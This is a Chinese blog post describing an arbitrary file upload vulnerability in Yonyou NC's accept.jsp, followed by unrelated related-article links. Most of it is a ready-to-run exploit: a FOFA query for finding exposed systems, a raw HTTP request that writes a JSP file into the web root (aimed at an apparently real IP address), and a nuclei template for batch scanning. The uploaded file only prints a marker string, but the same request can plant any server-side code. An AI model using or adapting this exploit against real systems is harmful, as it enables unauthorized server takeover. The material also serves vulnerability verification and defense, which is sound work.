首页 > 其他分享 >用友NC accept.jsp任意文件上传漏洞

用友NC accept.jsp任意文件上传漏洞

时间:2023-10-28 22:55:50浏览次数:48  
标签:form NC accept Content 16314487820932200903769468567 jsp -----------------------

漏洞简介

用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。

漏洞复现

fofa语法:app="用友-UFIDA-NC"
登录页面如下:

POC

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: 106.14.160.167:8090
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567

-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="2XOSxplUo2EnwilSNJazJYZxZUc.txt"
Content-Type: text/plain

<% out.println("2XOSxnJbIM7VyX60FJvryCft1X5"); %>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XOSxnFIgjeaGE7MQmmZiv3Imfw.jsp
-----------------------------16314487820932200903769468567--


访问上传后的文件

nuclei批量yaml文件

id: yonyou_NC_accept_fileupload

info:
  name: YonYou NC Accept Upload - Arbitray File Upload
  author: SleepingBag945
  severity: critical
  description: |
    Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
    - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1085941792"
  tags: yonyou,nc,intrusive,fileupload

http:
  - raw:
      - |
        POST /aim/equipmap/accept.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
        Accept-Encoding: gzip

        -----------------------------16314487820932200903769468567
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
        Content-Type: text/plain

        <% out.println("{{randstr_2}}"); %>
        -----------------------------16314487820932200903769468567
        Content-Disposition: form-data; name="fname"

        \webapps\nc_web\{{randstr_3}}.jsp
        -----------------------------16314487820932200903769468567--
      - |
        GET /{{randstr_3}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
# digest: 4a0a00473045022100abd01a38d228d42edb7cc9812400c533448e2af7e70d3cabae409884e5564d1b022039588d8a867cec38f95254eec1efcf1efbe40ee9d7b1c4e627b5b0de8473cace:922c64590222798bb761d5b6d8e72950

标签:form,NC,accept,Content,16314487820932200903769468567,jsp,-----------------------
From: https://www.cnblogs.com/pursue-security/p/17794824.html

相关文章

  • oracle中concat函数与在mysql中的使用
    在Oracle中使用concat函数来做拼接:我们想要得到的效果: 对应的sql语句如下: MySQL的中使用:我们直接使用concat()函数就行 ......
  • 前端多线程处理——async/await
    async从字面上看就是“异步”,它放在函数定义之前,是使该函数在调用时开一个子线程,以不影响主线程的运行。而await经常和async组合使用,在async定义的函数中来等待需要时间运行的代码(如ajax请求、Promise对象)的运行结果,以做后续的处理。  如下面的返回Promise对象......
  • 使用pandas,Missing optional dependency 'xlrd'. Install xlrd >= 2.0.1 for xls Exce
    遇到问题使用pandas处理excel数据,报错:ImportError:Missingoptionaldependency'xlrd'.Installxlrd>=2.0.1forxlsExcelsupportUsepiporcondatoinstallxlrd.解决方案是xlrd版本不匹配,手动安装xlrd......
  • referencing included files in pandoc markdown for docx output
    IhavemultiplemarkdownfilestobecomeaWorddoc:pandoc-fmarkdown--toc-oout.docxfile1.mddirA\file2.mddirB\file3.mdIfyouspecifymultipleinputfiles,theyareactuallyconcatenatedbytheshellandthenpassedtopandoc.Sono,theinpu......
  • OpenCV介绍与GUI特征(一)
    @TOC编辑者:廿瓶鲸(和鲸社区Siby团队成员)IT科程FREE0.1OpenCV-Python教程简介OpenCVOpenCV于1999年由GaryBradsky在英特尔创建,第一个版本于2000年问世。VadimPisarevsky加入GaryBradsky,管理英特尔的俄罗斯软件OpenCV团队。2005年,OpenCV被用在Stanley上,该车赢得了2005年的DARPA大......
  • 用友GRP-U8 license_check.jsp sql注入漏洞
    漏洞描述用友GRP-U8license_check.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。漏洞复现fofa语法:app="用友-GRP-U8"登录页面如下:POC:/u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%2......
  • 用友U8-Cloud upload.jsp 任意文件上传漏洞
    漏洞简介U8cloud聚焦成长型、创新型企业的云ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云ERP整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统upload.......
  • AQS是什么?AbstractQueuedSynchronizer之AQS原理及源码深度分析
    文章目录一、AQS概述1、什么是AQS2、技术解释3、基本原理4、AQS为什么这么重要二、AQS数据结构1、AQS的结构2、ReentrantLock与AbstractQueuedSynchronizer3、AQS的state变量4、AQS的队列5、AQS的Node(1)Node的waitStatus(2)属性说明三、ReentrantLock的lock方法分析AQS源码1、类图2、......
  • redshift DATE_TRUNC函数 查询日期上个月的26号到当前月的26号
    redshiftDATE_TRUNC函数查询日期上个月的26号到当前月的26号#redshift脚本#2023-08-0100:00:00.000selectDATE_TRUNC('month',current_date-INTERVAL'2month')#2023-08selectleft(DATE_TRUNC('month',current_date-INTERVAL'2month......
  • OpenCV4.1.0中的GPU版本的SURF特征点提取类的命名空间、所在头文件和类名
    OpenCV4.1.0中的GPU版本的SURF特征点提取类的命名空间、所在头文件和类名情况如下:类名:cv::cuda::SURF_CUDA所在的命名空间:cv::cuda所在头文件:$\build\install\include\opencv2\xfeatures2d。其中,$是编译OpenCV4.1.0的基础模块和扩展模块时,OpenCV4.1.0源代码所在的位置。 翻......